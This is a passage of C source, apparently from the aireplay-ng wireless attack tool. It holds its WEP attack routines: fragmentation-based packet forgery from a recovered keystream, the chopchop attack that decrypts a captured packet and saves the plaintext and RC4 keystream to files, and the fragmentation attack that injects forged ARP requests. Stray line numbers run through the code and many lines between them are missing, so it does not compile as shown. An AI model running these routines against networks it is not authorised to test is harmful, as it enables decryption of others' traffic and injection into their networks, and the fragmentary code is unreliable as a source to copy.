if( (caplen-z == 68-24 || caplen-z == 86-24) && (memcmp(dmac, BROADCAST, 6) == 0 || (dmac[0]%2) == 0) )
3180
printf("Found ARP packet\n");
3182
//build the new packet
3183
set_clear_arp(clear, smac, dmac);
3184
set_final_arp(final, opt.r_smac);
3187
keystream[i] = (h80211+z+4)[i] ^ clear[i];
3189
// correct 80211 header
3190
// h80211[0] = 0x08; //data
3191
if( (h80211[1] & 3) == 0x00 ) //ad-hoc
3193
h80211[1] = 0x40; //wep
3194
memcpy(h80211+4, smac, 6);
3195
memcpy(h80211+10, opt.r_smac, 6);
3196
memcpy(h80211+16, bssid, 6);
3202
h80211[1] = 0x41; //wep+ToDS
3203
memcpy(h80211+4 , bssid, 6);
3204
memcpy(h80211+10, opt.r_smac, 6);
3205
memcpy(h80211+16, smac, 6);
3209
h80211[1] = 0x42; //wep+FromDS
3210
memcpy(h80211+4, smac, 6);
3211
memcpy(h80211+10, bssid, 6);
3212
memcpy(h80211+16, opt.r_smac, 6);
3215
h80211[22] = 0xD0; //frag = 0;
3218
//need to shift by 10 bytes; (add 1 frag in front)
3219
memcpy(frag1, h80211, z+4); //copy 80211 header and IV
3220
frag1[1] |= 0x04; //more frags
3221
memcpy(frag1+z+4, S_LLC_SNAP_ARP, 8);
3222
frag1[z+4+8] = 0x00;
3223
frag1[z+4+9] = 0x01; //ethernet
3224
add_crc32(frag1+z+4, 10);
3226
(frag1+z+4)[i] ^= keystream[i];
3227
/* frag1 finished */
3229
for(i=0; i<caplen; i++)
3230
flip[i] = clear[i] ^ final[i];
3232
add_crc32_plain(flip, caplen-z-4-4);
3234
for(i=0; i<caplen-z-4; i++)
3235
(h80211+z+4)[i] ^= flip[i];
3236
h80211[22] = 0xD1; // frag = 1;
3238
//ready to send frag1 / len=z+4+10+4 and h80211 / len = caplen
3243
printf("Found IP packet\n");
3245
//build the new packet
3246
set_clear_ip(clear, caplen-z-4-8-4); //caplen - ieee80211header - IVIDX - LLC/SNAP - ICV
3247
set_final_ip(final, opt.r_smac);
3250
keystream[i] = (h80211+z+4)[i] ^ clear[i];
3252
// correct 80211 header
3253
// h80211[0] = 0x08; //data
3254
if( (h80211[1] & 3) == 0x00 ) //ad-hoc
3256
h80211[1] = 0x40; //wep
3257
memcpy(h80211+4, smac, 6);
3258
memcpy(h80211+10, opt.r_smac, 6);
3259
memcpy(h80211+16, bssid, 6);
3265
h80211[1] = 0x41; //wep+ToDS
3266
memcpy(h80211+4 , bssid, 6);
3267
memcpy(h80211+10, opt.r_smac, 6);
3268
memcpy(h80211+16, smac, 6);
3272
h80211[1] = 0x42; //wep+FromDS
3273
memcpy(h80211+4, smac, 6);
3274
memcpy(h80211+10, bssid, 6);
3275
memcpy(h80211+16, opt.r_smac, 6);
3278
h80211[22] = 0xD0; //frag = 0;
3281
//need to shift by 12 bytes;(add 3 frags in front)
3282
memcpy(frag1, h80211, z+4); //copy 80211 header and IV
3283
memcpy(frag2, h80211, z+4); //copy 80211 header and IV
3284
memcpy(frag3, h80211, z+4); //copy 80211 header and IV
3285
frag1[1] |= 0x04; //more frags
3286
frag2[1] |= 0x04; //more frags
3287
frag3[1] |= 0x04; //more frags
3289
memcpy(frag1+z+4, S_LLC_SNAP_ARP, 4);
3290
add_crc32(frag1+z+4, 4);
3292
(frag1+z+4)[i] ^= keystream[i];
3294
memcpy(frag2+z+4, S_LLC_SNAP_ARP+4, 4);
3295
add_crc32(frag2+z+4, 4);
3297
(frag2+z+4)[i] ^= keystream[i];
3298
frag2[22] = 0xD1; //frag = 1;
3300
frag3[z+4+0] = 0x00;
3301
frag3[z+4+1] = 0x01; //ether
3302
frag3[z+4+2] = 0x08; //IP
3303
frag3[z+4+3] = 0x00;
3304
add_crc32(frag3+z+4, 4);
3306
(frag3+z+4)[i] ^= keystream[i];
3307
frag3[22] = 0xD2; //frag = 2;
3308
/* frag1,2,3 finished */
3310
for(i=0; i<caplen; i++)
3311
flip[i] = clear[i] ^ final[i];
3313
add_crc32_plain(flip, caplen-z-4-4);
3315
for(i=0; i<caplen-z-4; i++)
3316
(h80211+z+4)[i] ^= flip[i];
3317
h80211[22] = 0xD3; // frag = 3;
3319
//ready to send frag1,2,3 / len=z+4+4+4 and h80211 / len = caplen
3323
/* loop resending the packet */
3325
/* TODO: actually check whether airodump-ng is running; for now the reminder below is printed unconditionally */
3326
printf( "You should also start airodump-ng to capture replies.\n\n" );
3328
signal( SIGINT, sighandler );
3331
memset( ticks, 0, sizeof( ticks ) );
3340
/* wait for the next timer interrupt, or sleep */
3342
if( dev.fd_rtc >= 0 )
3344
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
3346
perror( "read(/dev/rtc) failed" );
3356
/* we can't trust usleep, since it depends on the HZ */
3358
gettimeofday( &tv, NULL );
3359
usleep( 1000000/RTC_RESOLUTION );
3360
gettimeofday( &tv2, NULL );
3362
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
3363
+ (float) ( tv2.tv_usec - tv.tv_usec );
3365
ticks[0] += f / ( 1000000/RTC_RESOLUTION );
3366
ticks[1] += f / ( 1000000/RTC_RESOLUTION );
3367
ticks[2] += f / ( 1000000/RTC_RESOLUTION );
3370
/* update the status line */
3372
if( ticks[1] > (RTC_RESOLUTION/10) )
3375
printf( "\rSent %ld packets...(%d pps)\33[K\r", nb_pkt_sent, (int)((double)nb_pkt_sent/((double)ticks[0]/(double)RTC_RESOLUTION)));
3379
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION < 1 )
3382
/* threshold reached */
3386
if( nb_pkt_sent == 0 )
3391
if( send_packet( frag1, z+4+10+4 ) < 0 )
3397
if( send_packet( frag1, z+4+4+4 ) < 0 )
3399
if( send_packet( frag2, z+4+4+4 ) < 0 )
3401
if( send_packet( frag3, z+4+4+4 ) < 0 )
3405
if( send_packet( h80211, caplen ) < 0 )
3412
int do_attack_chopchop( void )
3415
int i, j, n, z, caplen, srcz;
3416
int data_start, data_end, srcdiff, diff;
3417
int guess, is_deauth_mode;
3419
int tried_header_rec=0;
3421
unsigned char b1 = 0xAA;
3422
unsigned char b2 = 0xAA;
3426
unsigned long crc_mask;
3427
unsigned char *chopped;
3435
struct pcap_file_header pfh_out;
3436
struct pcap_pkthdr pkh;
3439
if(getnet(NULL, 1, 0) != 0)
3442
srand( time( NULL ) );
3444
if( capture_ask_packet( &caplen, 0 ) != 0 )
3447
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3448
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3452
if( (unsigned)caplen > sizeof(srcbuf) || (unsigned)caplen > sizeof(h80211) )
3455
if( opt.r_smac_set == 1 )
3457
//handle picky APs (send one valid packet before all the invalid ones)
3458
memset(packet, 0, sizeof(packet));
3460
memcpy( packet, NULL_DATA, 24 );
3461
memcpy( packet + 4, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
3462
memcpy( packet + 10, opt.r_smac, 6 );
3463
memcpy( packet + 16, opt.f_bssid, 6 );
3465
packet[0] = 0x08; //make it a data packet
3466
packet[1] = 0x41; //set encryption and ToDS=1
3468
memcpy( packet+24, h80211+z, caplen-z);
3470
if( send_packet( packet, caplen-z+24 ) != 0 )
3472
//done sending a correct packet
3475
/* Special handling for spanning-tree packets */
3476
if ( memcmp( h80211 + 4, SPANTREE, 6 ) == 0 ||
3477
memcmp( h80211 + 16, SPANTREE, 6 ) == 0 )
3479
b1 = 0x42; b2 = 0x42;
3484
/* chopchop operation mode: truncate and decrypt the packet */
3485
/* we assume the plaintext starts with AA AA 03 00 00 00 */
3486
/* (42 42 03 00 00 00 for spanning-tree packets) */
3488
memcpy( srcbuf, h80211, caplen );
3490
/* setup the chopping buffer */
3492
n = caplen - z + 24;
3494
if( ( chopped = (unsigned char *) malloc( n ) ) == NULL )
3496
perror( "malloc failed" );
3500
memset( chopped, 0, n );
3502
data_start = 24 + 4;
3506
chopped[0] = 0x08; /* normal data frame */
3507
chopped[1] = 0x41; /* WEP = 1, ToDS = 1 */
3509
/* copy the duration */
3511
memcpy( chopped + 2, h80211 + 2, 2 );
3513
/* copy the BSSID */
3515
switch( h80211[1] & 3 )
3517
case 0: memcpy( chopped + 4, h80211 + 16, 6 ); break;
3518
case 1: memcpy( chopped + 4, h80211 + 4, 6 ); break;
3519
case 2: memcpy( chopped + 4, h80211 + 10, 6 ); break;
3520
default: memcpy( chopped + 4, h80211 + 10, 6 ); break;
3523
/* copy the WEP IV */
3525
memcpy( chopped + 24, h80211 + z, 4 );
3527
/* setup the xor mask to hide the original data */
3531
for( i = data_start; i < data_end - 4; i++ )
3533
switch( i - data_start )
3535
case 0: chopped[i] = b1 ^ 0xE0; break;
3536
case 1: chopped[i] = b2 ^ 0xE0; break;
3537
case 2: chopped[i] = 0x03 ^ 0x03; break;
3538
default: chopped[i] = 0x55 ^ ( i & 0xFF ); break;
3541
crc_mask = crc_tbl[crc_mask & 0xFF]
3543
^ ( chopped[i] << 24 );
3546
for( i = 0; i < 4; i++ )
3547
crc_mask = crc_tbl[crc_mask & 0xFF]
3548
^ ( crc_mask >> 8 );
3550
chopped[data_end - 4] = crc_mask; crc_mask >>= 8;
3551
chopped[data_end - 3] = crc_mask; crc_mask >>= 8;
3552
chopped[data_end - 2] = crc_mask; crc_mask >>= 8;
3553
chopped[data_end - 1] = crc_mask; crc_mask >>= 8;
3555
for( i = data_start; i < data_end; i++ )
3556
chopped[i] ^= srcbuf[i+srcdiff];
3558
data_start += 6; /* skip the SNAP header */
3560
/* if the replay source mac is unspecified, forge one */
3562
if( opt.r_smac_set == 0 )
3566
opt.r_smac[0] = 0x00;
3567
opt.r_smac[1] = rand() & 0x3E;
3568
opt.r_smac[2] = rand() & 0xFF;
3569
opt.r_smac[3] = rand() & 0xFF;
3570
opt.r_smac[4] = rand() & 0xFF;
3572
memcpy( opt.r_dmac, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
3578
opt.r_dmac[0] = 0xFF;
3579
opt.r_dmac[1] = rand() & 0xFE;
3580
opt.r_dmac[2] = rand() & 0xFF;
3581
opt.r_dmac[3] = rand() & 0xFF;
3582
opt.r_dmac[4] = rand() & 0xFF;
3585
/* let's go chopping */
3587
memset( ticks, 0, sizeof( ticks ) );
3598
signal( SIGALRM, sighandler );
3600
if(opt.port_in <= 0)
3602
if( fcntl( dev.fd_in, F_SETFL, O_NONBLOCK ) < 0 )
3604
perror( "fcntl(O_NONBLOCK) failed" );
3609
while( data_end > data_start )
3614
"The chopchop attack appears to have failed. Possible reasons:\n"
3616
" * You're trying to inject with an unsupported chipset (Centrino?).\n"
3617
" * The driver source wasn't properly patched for injection support.\n"
3618
" * You are too far from the AP. Get closer or reduce the send rate.\n"
3619
" * Target is 802.11g only but you are using a Prism2 or RTL8180.\n"
3620
" * The wireless interface isn't setup on the correct channel.\n" );
3621
if( is_deauth_mode )
3623
" * The AP isn't vulnerable when operating in non-authenticated mode.\n"
3624
" Run aireplay-ng in authenticated mode instead (-h option).\n\n" );
3627
" * The client MAC you have specified is not currently authenticated.\n"
3628
" Try running another aireplay-ng to fake authentication (attack \"-1\").\n"
3629
" * The AP isn't vulnerable when operating in authenticated mode.\n"
3630
" Try aireplay-ng in non-authenticated mode instead (no -h option).\n\n" );
3634
/* wait for the next timer interrupt, or sleep */
3636
if( dev.fd_rtc >= 0 )
3638
if( read( dev.fd_rtc, &n, sizeof( n ) ) < 0 )
3640
perror( "\nread(/dev/rtc) failed" );
3644
ticks[0]++; /* ticks since we entered the while loop */
3645
ticks[1]++; /* ticks since the last status line update */
3646
ticks[2]++; /* ticks since the last frame was sent */
3647
ticks[3]++; /* ticks since started chopping current byte */
3651
/* we can't trust usleep, since it depends on the HZ */
3653
gettimeofday( &tv, NULL );
3655
gettimeofday( &tv2, NULL );
3657
f = 1000000 * (float) ( tv2.tv_sec - tv.tv_sec )
3658
+ (float) ( tv2.tv_usec - tv.tv_usec );
3660
ticks[0] += f / 976;
3661
ticks[1] += f / 976;
3662
ticks[2] += f / 976;
3663
ticks[3] += f / 976;
3666
/* update the status line */
3668
if( ticks[1] > (RTC_RESOLUTION/10) )
3671
printf( "\rSent %3ld packets, current guess: %02X...\33[K",
3672
nb_pkt_sent, guess );
3676
if( data_end < 41 && ticks[3] > 8 * ( ticks[0] - ticks[3] ) /
3677
(int) ( caplen - ( data_end - 1 ) ) )
3681
printf( "\n\nThe AP appears to drop packets shorter "
3682
"than %d bytes.\n",data_end );
3686
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3687
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3692
if( ( chopped[data_end + 0] ^ srcbuf[data_end + srcdiff + 0] ) == 0x06 &&
3693
( chopped[data_end + 1] ^ srcbuf[data_end + srcdiff + 1] ) == 0x04 &&
3694
( chopped[data_end + 2] ^ srcbuf[data_end + srcdiff + 2] ) == 0x00 )
3696
printf( "Enabling standard workaround: "
3697
"ARP header re-creation.\n" );
3699
chopped[24 + 10] = srcbuf[srcz + 10] ^ 0x08;
3700
chopped[24 + 11] = srcbuf[srcz + 11] ^ 0x06;
3701
chopped[24 + 12] = srcbuf[srcz + 12] ^ 0x00;
3702
chopped[24 + 13] = srcbuf[srcz + 13] ^ 0x01;
3703
chopped[24 + 14] = srcbuf[srcz + 14] ^ 0x08;
3704
chopped[24 + 15] = srcbuf[srcz + 15] ^ 0x00;
3708
printf( "Enabling standard workaround: "
3709
" IP header re-creation.\n" );
3711
n = caplen - ( z + 16 );
3713
chopped[24 + 4] = srcbuf[srcz + 4] ^ 0xAA;
3714
chopped[24 + 5] = srcbuf[srcz + 5] ^ 0xAA;
3715
chopped[24 + 6] = srcbuf[srcz + 6] ^ 0x03;
3716
chopped[24 + 7] = srcbuf[srcz + 7] ^ 0x00;
3717
chopped[24 + 8] = srcbuf[srcz + 8] ^ 0x00;
3718
chopped[24 + 9] = srcbuf[srcz + 9] ^ 0x00;
3719
chopped[24 + 10] = srcbuf[srcz + 10] ^ 0x08;
3720
chopped[24 + 11] = srcbuf[srcz + 11] ^ 0x00;
3721
chopped[24 + 14] = srcbuf[srcz + 14] ^ ( n >> 8 );
3722
chopped[24 + 15] = srcbuf[srcz + 15] ^ ( n & 0xFF );
3724
memcpy( h80211, srcbuf, caplen );
3726
for( i = z + 4; i < (int) caplen; i++ )
3727
h80211[i - 4] = h80211[i] ^ chopped[i-diff];
3729
/* sometimes the header length or the tos field vary */
3731
for( i = 0; i < 16; i++ )
3733
h80211[z + 8] = 0x40 + i;
3734
chopped[24 + 12] = srcbuf[srcz + 12] ^ ( 0x40 + i );
3736
for( j = 0; j < 256; j++ )
3739
chopped[24 + 13] = srcbuf[srcz + 13] ^ j;
3741
if( check_crc_buf( h80211 + z, caplen - z - 8 ) )
3742
goto have_crc_match;
3746
printf( "This doesn't look like an IP packet, "
3747
"try another one.\n" );
3754
if( ( ticks[2] * opt.r_nbpps ) / RTC_RESOLUTION >= 1 )
3756
/* send one modified frame */
3760
memcpy( h80211, chopped, data_end - 1 );
3762
/* note: guess 256 is special, it tests if the *
3763
* AP properly drops frames with an invalid ICV *
3764
* so this guess always has its bit 8 set to 0 */
3766
if( is_deauth_mode )
3768
opt.r_smac[1] |= ( guess < 256 );
3769
opt.r_smac[5] = guess & 0xFF;
3773
opt.r_dmac[1] |= ( guess < 256 );
3774
opt.r_dmac[5] = guess & 0xFF;
3777
memcpy( h80211 + 10, opt.r_smac, 6 );
3778
memcpy( h80211 + 16, opt.r_dmac, 6 );
3782
h80211[data_end - 2] ^= crc_chop_tbl[guess][3];
3783
h80211[data_end - 3] ^= crc_chop_tbl[guess][2];
3784
h80211[data_end - 4] ^= crc_chop_tbl[guess][1];
3785
h80211[data_end - 5] ^= crc_chop_tbl[guess][0];
3790
if( send_packet( h80211, data_end -1 ) != 0 )
3793
if( errno != EAGAIN )
3802
/* watch for a response from the AP */
3804
n = read_packet( h80211, sizeof( h80211 ), NULL );
3806
if( n < 0 ) return( 1 );
3807
if( n == 0 ) continue;
3811
/* check if it's a deauth packet */
3813
if( h80211[0] == 0xA0 || h80211[0] == 0xC0 )
3815
if( memcmp( h80211 + 4, opt.r_smac, 6 ) == 0 &&
3820
if( nb_bad_pkt > 256 )
3822
printf("\rgot several deauthentication packets - pausing 3 seconds for reconnection\n");
3830
if( h80211[4] != opt.r_smac[0] ) continue;
3831
if( h80211[6] != opt.r_smac[2] ) continue;
3832
if( h80211[7] != opt.r_smac[3] ) continue;
3833
if( h80211[8] != opt.r_smac[4] ) continue;
3835
if( ( h80211[5] & 0xFE ) !=
3836
( opt.r_smac[1] & 0xFE ) ) continue;
3838
if( ! ( h80211[5] & 1 ) )
3840
if( data_end < 41 ) goto header_rec;
3842
printf( "\n\nFailure: the access point does not properly "
3843
"discard frames with an\ninvalid ICV - try running "
3844
"aireplay-ng in authenticated mode (-h) instead.\n\n" );
3850
if( is_deauth_mode )
3853
/* check if it's a WEP data packet */
3855
if( ( h80211[0] & 0x0C ) != 8 ) continue;
3856
if( ( h80211[0] & 0x70 ) != 0 ) continue;
3857
if( ( h80211[1] & 0x03 ) != 2 ) continue;
3858
if( ( h80211[1] & 0x40 ) == 0 ) continue;
3860
/* check the extended IV (TKIP) flag */
3862
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3863
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3866
if( ( h80211[z + 3] & 0x20 ) != 0 ) continue;
3868
/* check the destination address */
3870
if( h80211[4] != opt.r_dmac[0] ) continue;
3871
if( h80211[6] != opt.r_dmac[2] ) continue;
3872
if( h80211[7] != opt.r_dmac[3] ) continue;
3873
if( h80211[8] != opt.r_dmac[4] ) continue;
3875
if( ( h80211[5] & 0xFE ) !=
3876
( opt.r_dmac[1] & 0xFE ) ) continue;
3878
if( ! ( h80211[5] & 1 ) )
3880
if( data_end < 41 ) goto header_rec;
3882
printf( "\n\nFailure: the access point does not properly "
3883
"discard frames with an\ninvalid ICV - try running "
3884
"aireplay-ng in non-authenticated mode instead.\n\n" );
3889
/* we have a winner */
3893
chopped[data_end - 1] ^= guess;
3894
chopped[data_end - 2] ^= crc_chop_tbl[guess][3];
3895
chopped[data_end - 3] ^= crc_chop_tbl[guess][2];
3896
chopped[data_end - 4] ^= crc_chop_tbl[guess][1];
3897
chopped[data_end - 5] ^= crc_chop_tbl[guess][0];
3899
n = caplen - data_start;
3901
printf( "\rOffset %4d (%2d%% done) | xor = %02X | pt = %02X | "
3902
"%4ld frames written in %5.0fms\n", data_end - 1,
3903
100 * ( caplen - data_end ) / n,
3904
chopped[data_end - 1],
3905
chopped[data_end - 1] ^ srcbuf[data_end + srcdiff - 1],
3906
nb_pkt_sent, ticks[3] );
3908
if( is_deauth_mode )
3910
opt.r_smac[1] = rand() & 0x3E;
3911
opt.r_smac[2] = rand() & 0xFF;
3912
opt.r_smac[3] = rand() & 0xFF;
3913
opt.r_smac[4] = rand() & 0xFF;
3917
opt.r_dmac[1] = rand() & 0xFE;
3918
opt.r_dmac[2] = rand() & 0xFF;
3919
opt.r_dmac[3] = rand() & 0xFF;
3920
opt.r_dmac[4] = rand() & 0xFF;
3933
/* reveal the plaintext (chopped contains the prga) */
3935
memcpy( h80211, srcbuf, caplen );
3937
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
3938
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
3942
chopped[24 + 4] = srcbuf[srcz + 4] ^ b1;
3943
chopped[24 + 5] = srcbuf[srcz + 5] ^ b2;
3944
chopped[24 + 6] = srcbuf[srcz + 6] ^ 0x03;
3945
chopped[24 + 7] = srcbuf[srcz + 7] ^ 0x00;
3946
chopped[24 + 8] = srcbuf[srcz + 8] ^ 0x00;
3947
chopped[24 + 9] = srcbuf[srcz + 9] ^ 0x00;
3949
for( i = z + 4; i < (int) caplen; i++ )
3950
h80211[i - 4] = h80211[i] ^ chopped[i-diff];
3952
if( ! check_crc_buf( h80211 + z, caplen - z - 8 ) ) {
3953
if (!tried_header_rec) {
3954
printf( "\nWarning: ICV checksum verification FAILED! Trying workaround.\n" );
3958
printf( "\nWorkaround couldn't fix ICV checksum.\nPacket is most likely invalid/useless\nTry another one.\n" );
3962
caplen -= 4 + 4; /* remove the WEP IV & CRC (ICV) */
3964
h80211[1] &= 0xBF; /* remove the WEP bit, too */
3966
/* save the decrypted packet */
3968
gettimeofday( &tv, NULL );
3970
pfh_out.magic = TCPDUMP_MAGIC;
3971
pfh_out.version_major = PCAP_VERSION_MAJOR;
3972
pfh_out.version_minor = PCAP_VERSION_MINOR;
3973
pfh_out.thiszone = 0;
3974
pfh_out.sigfigs = 0;
3975
pfh_out.snaplen = 65535;
3976
pfh_out.linktype = LINKTYPE_IEEE802_11;
3978
pkh.tv_sec = tv.tv_sec;
3979
pkh.tv_usec = tv.tv_usec;
3980
pkh.caplen = caplen;
3983
lt = localtime( (const time_t *) &tv.tv_sec );
3985
memset( strbuf, 0, sizeof( strbuf ) );
3986
snprintf( strbuf, sizeof( strbuf ) - 1,
3987
"replay_dec-%02d%02d-%02d%02d%02d.cap",
3988
lt->tm_mon + 1, lt->tm_mday,
3989
lt->tm_hour, lt->tm_min, lt->tm_sec );
3991
printf( "\nSaving plaintext in %s\n", strbuf );
3993
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
3995
perror( "fopen failed" );
3999
n = sizeof( struct pcap_file_header );
4001
if( fwrite( &pfh_out, n, 1, f_cap_out ) != 1 )
4003
perror( "fwrite failed\n" );
4009
if( fwrite( &pkh, n, 1, f_cap_out ) != 1 )
4011
perror( "fwrite failed" );
4017
if( fwrite( h80211, n, 1, f_cap_out ) != 1 )
4019
perror( "fwrite failed" );
4023
fclose( f_cap_out );
4025
/* save the RC4 stream (xor mask) */
4027
memset( strbuf, 0, sizeof( strbuf ) );
4028
snprintf( strbuf, sizeof( strbuf ) - 1,
4029
"replay_dec-%02d%02d-%02d%02d%02d.xor",
4030
lt->tm_mon + 1, lt->tm_mday,
4031
lt->tm_hour, lt->tm_min, lt->tm_sec );
4033
printf( "Saving keystream in %s\n", strbuf );
4035
if( ( f_cap_out = fopen( strbuf, "wb+" ) ) == NULL )
4037
perror( "fopen failed" );
4041
n = pkh.caplen + 8 - 24;
4043
if( fwrite( chopped + 24, n, 1, f_cap_out ) != 1 )
4045
perror( "fwrite failed" );
4049
fclose( f_cap_out );
4051
printf( "\nCompleted in %lds (%0.2f bytes/s)\n\n",
4052
(long) time( NULL ) - tt,
4053
(float) ( pkh.caplen - 6 - 24 ) /
4054
(float) ( time( NULL ) - tt ) );
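/*
 * Build an 802.11 data frame (WEP + ToDS flags set) carrying an ARP request
 * into h80211 and zero-pad it to `size` bytes.
 *
 * Byte layout written:
 *   0..3    frame control / duration ("\x08\x41\x95\x00")
 *   4..21   bssid, src_mac, dst_mac (6 bytes each)
 *   22..23  sequence control, zeroed
 *   24..39  LLC/SNAP + fixed ARP header (hw type, proto type, lengths, opcode 1)
 *   40..59  sender MAC, sender IP, zeroed target MAC, target IP
 *   60..size-1  zero padding
 *
 * The caller's h80211 must hold at least `size` bytes.  `size` below 60 is
 * rejected: the padding memset would otherwise receive a negative length,
 * which converts to a huge size_t and overruns the caller's buffer.
 *
 * Returns 0 on success, -1 when size < 60 (nothing is written in that case).
 */
int make_arp_request(unsigned char *h80211, unsigned char *bssid, unsigned char *src_mac, unsigned char *dst_mac, unsigned char *src_ip, unsigned char *dst_ip, int size)
{
    /* LLC/SNAP (AA AA 03 00 00 00), EtherType ARP (08 06), then the fixed
     * ARP header: hw type 1, proto 0x0800, hw len 6, proto len 4, opcode 1. */
    const unsigned char *arp_header = (const unsigned char *)"\xaa\xaa\x03\x00\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01";
    /* data frame, flags WEP=1 ToDS=1, duration 0x0095 */
    const unsigned char *header80211 = (const unsigned char *)"\x08\x41\x95\x00";

    /* everything up to and including the target IP needs 60 bytes */
    if (size < 60) {
        return -1;
    }

    /* 802.11 part */
    memcpy(h80211, header80211, 4);
    memcpy(h80211 + 4, bssid, 6);
    memcpy(h80211 + 10, src_mac, 6);
    memcpy(h80211 + 16, dst_mac, 6);
    h80211[22] = '\x00';
    h80211[23] = '\x00';

    /* ARP part */
    memcpy(h80211 + 24, arp_header, 16);
    memcpy(h80211 + 40, src_mac, 6);
    memcpy(h80211 + 46, src_ip, 4);
    memset(h80211 + 50, '\x00', 6);   /* target MAC unknown -> zero */
    memcpy(h80211 + 56, dst_ip, 4);

    /* Insert padding bytes (size - 60 is now guaranteed >= 0) */
    memset(h80211 + 60, '\x00', (size_t)(size - 60));

    return 0;
}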
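/*
 * Write a keystream file: the 4-byte WEP IV followed by prgalen bytes of
 * keystream (PRGA), binary mode, created or truncated.
 *
 * The signature stays void for the existing callers, so failures are only
 * reported through perror(); on error the file may be missing or partial.
 * A negative prgalen is treated as 0 instead of being converted to a huge
 * size_t by fwrite().
 */
void save_prga(char *filename, unsigned char *iv, unsigned char *prga, int prgalen)
{
    FILE *xorfile = fopen(filename, "wb");

    /* the original dereferenced a NULL stream here on fopen failure */
    if (xorfile == NULL) {
        perror("fopen failed");
        return;
    }

    if (prgalen < 0) {
        prgalen = 0;
    }

    if (fwrite(iv, 1, 4, xorfile) != 4 ||
        fwrite(prga, 1, (size_t)prgalen, xorfile) != (size_t)prgalen) {
        perror("fwrite failed");
    }

    /* fclose flushes; a failed flush is still an incomplete file */
    if (fclose(xorfile) != 0) {
        perror("fclose failed");
    }
}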
int do_attack_fragment()
4098
uchar packet2[4096];
4102
// uchar ack[14] = "\xd4";
4107
struct timeval tv, tv2;
4124
uchar *snap_header = (unsigned char*)"\xAA\xAA\x03\x00\x00\x00\x08\x00";
4126
done = caplen = caplen2 = arplen = round = 0;
4127
prga_len = isrelay = gotit = again = length = 0;
4129
if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
4131
printf( "Please specify a source MAC (-h).\n" );
4135
if(getnet(NULL, 1, 1) != 0)
4138
if( memcmp( opt.r_dmac, NULL_MAC, 6 ) == 0 )
4140
memset( opt.r_dmac, '\xFF', 6);
4141
opt.r_dmac[5] = 0xED;
4144
if( memcmp( opt.r_sip, NULL_MAC, 4 ) == 0 )
4146
memset( opt.r_sip, '\xFF', 4);
4149
if( memcmp( opt.r_dip, NULL_MAC, 4 ) == 0 )
4151
memset( opt.r_dip, '\xFF', 4);
4154
PCT; printf ("Waiting for a data packet...\n");
4160
if( capture_ask_packet( &caplen, 0 ) != 0 )
4163
z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
4164
if ( ( h80211[0] & 0x80 ) == 0x80 ) /* QoS */
4167
if((unsigned)caplen > sizeof(packet) || (unsigned)caplen > sizeof(packet2))
4170
memcpy( packet2, h80211, caplen );
4172
PCT; printf("Data packet found!\n");
4174
if ( memcmp( packet2 + 4, SPANTREE, 6 ) == 0 ||
4175
memcmp( packet2 + 16, SPANTREE, 6 ) == 0 )
4177
packet2[z+4] = ((packet2[z+4] ^ 0x42) ^ 0xAA); //0x42 instead of 0xAA
4178
packet2[z+5] = ((packet2[z+5] ^ 0x42) ^ 0xAA); //0x42 instead of 0xAA
4179
packet2[z+10] = ((packet2[z+10] ^ 0x00) ^ 0x08); //0x00 instead of 0x08
4186
memcpy( packet, packet2, caplen2 );
4188
memcpy(prga, packet+z+4, prga_len);
4189
memcpy(iv, packet+z, 4);
4191
xor_keystream(prga, snap_header, prga_len);
4193
while(again == RETRY) //sending 7byte fragments
4198
make_arp_request(h80211, opt.f_bssid, opt.r_smac, opt.r_dmac, opt.r_sip, opt.r_dip, arplen);
4200
if ((round % 2) == 1)
4202
PCT; printf("Trying a LLC NULL packet\n");
4203
memset(h80211+24, '\x00', 39);
4208
packets=(arplen-24)/(prga_len-4);
4209
if( (arplen-24)%(prga_len-4) != 0 )
4212
PCT; printf("Sending fragmented packet\n");
4213
send_fragments(h80211, arplen, iv, prga, prga_len-4, 0);
4215
// send_packet(ack, 10);
4217
gettimeofday( &tv, NULL );
4220
while (!gotit) //waiting for relayed packet
4222
caplen = read_packet(packet, sizeof(packet), NULL);
4223
z = ( ( packet[1] & 3 ) != 3 ) ? 24 : 30;
4224
if ( ( packet[0] & 0x80 ) == 0x80 ) /* QoS */
4227
if (packet[0] == 0xD4 )
4229
if (! memcmp(opt.r_smac, packet+4, 6)) //To our MAC
4236
if ((packet[0] & 0x08) && (( packet[1] & 0x40 ) == 0x40) ) //Is data frame && encrypted
4238
if ( (packet[1] & 2) ) //Is a FromDS packet
4240
if (! memcmp(opt.r_dmac, packet+4, 6)) //To our MAC
4242
if (! memcmp(opt.r_smac, packet+16, 6)) //From our MAC
4244
if (caplen-z < 66) //Is short enough
4246
//This is our relayed packet!
4247
PCT; printf("Got RELAYED packet!!\n");
4256
/* check if we got an deauthentication packet */
4258
if( packet[0] == 0xC0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4260
PCT; printf( "Got a deauthentication packet!\n" );
4261
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4264
/* check if we got an disassociation packet */
4266
if( packet[0] == 0xA0 && memcmp( packet+4, opt.r_smac, 6) == 0 )
4268
PCT; printf( "Got a disassociation packet!\n" );
4269
read_sleep( 5*1000000 ); //sleep 5 seconds and ignore all frames in this period
4272
gettimeofday( &tv2, NULL );
4273
if (((tv2.tv_sec*1000000 - tv.tv_sec*1000000) + (tv2.tv_usec - tv.tv_usec)) > (100*1000) && acksgot >0 && acksgot < packets )//wait 100ms for acks
4275
PCT; printf("Not enough acks, repeating...\n");
4280
